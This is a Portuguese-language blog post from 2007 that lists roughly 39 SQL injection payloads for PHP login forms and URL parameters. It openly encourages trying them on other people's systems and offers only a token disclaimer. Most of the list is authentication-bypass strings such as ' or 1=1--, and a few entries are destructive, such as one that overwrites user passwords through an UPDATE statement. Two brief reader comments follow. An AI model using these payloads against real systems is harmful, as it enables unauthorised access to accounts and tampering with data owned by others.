SQL Injection Hacks no PHP

Setembro 24, 2007 on 2:21 pm | In Informatica, php, Hacker |

Continuando a diversão de se fazer testes no seu sistema ou se divertir com sistemas de outros segue uma lista de possíveis SQL injections, lembrando que pode-se utilizar tanto no login/senha no form ou como na url quando se utilizam método de $_GET no php, vamos lá:

PLAIN TEXT
HTML:
  1. user:admin
  2. pass:' or 1=1--
  3. user:' or 1=1--
  4. admin:' or 1=1--
  5. password:' or 1=1--
  6. admin:' or a=a--
  7. admin:' or 1=1--
  8. admin'--
  9. ' or 0=0 --
  10. " or 0=0 --
  11. or 0=0 --
  12. ' or 0=0 #
  13. " or 0=0 #
  14. or 0=0 #
  15. ' or 'x'='x
  16. " or "x"="x
  17. ') or ('x'='x
  18. ' or 1=1--
  19. " or 1=1--
  20. or 1=1--
  21. ' or a=a--
  22. " or "a"="a
  23. ') or ('a'='a
  24. ") or ("a"="a
  25. hi" or "a"="a
  26. hi" or 1=1 --
  27. hi' or 1=1 --
  28. hi' or 'a'='a
  29. hi') or ('a'='a
  30. hi") or ("a"="a
  31. 1 OR 1=1
  32. 1' OR '1'='1
  33. 1'1
  34. 1 EXEC SP_ (or EXEC XP_)
  35. 1 AND 1=1
  36. 1' AND 1=(SELECT COUNT(*) FROM tablenames); --
  37. " AND user like %name% --
  38. "; select user like %name% --
  39. "; update users set passw = 'newpass' where user like %name% --

Existem diversas outras formas de se fazer ataques e fazer antes pesquisas de versões, match, vetores, mapiamento do mysql e até mesmo com user do mysql interno. Mas por hoje fica a lista por aqui, lembrando que fica por sua conta e risco, isso é somente um informativo...


2 Comments »

RSS feed for comments on this post. TrackBack URI

  1. kkkk

    Comment by safdfdf — Fevereiro 19, 2008 #

  2. Bera iniciativa, mas não funciono... :P

    hehehehe
    Continue assim, so não floodar os coments por favor.

    Obrigado

    Comment by silici0 — Fevereiro 19, 2008 #

Leave a comment

XHTML: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <code> <em> <i> <strike> <strong>


 

 Assine o feed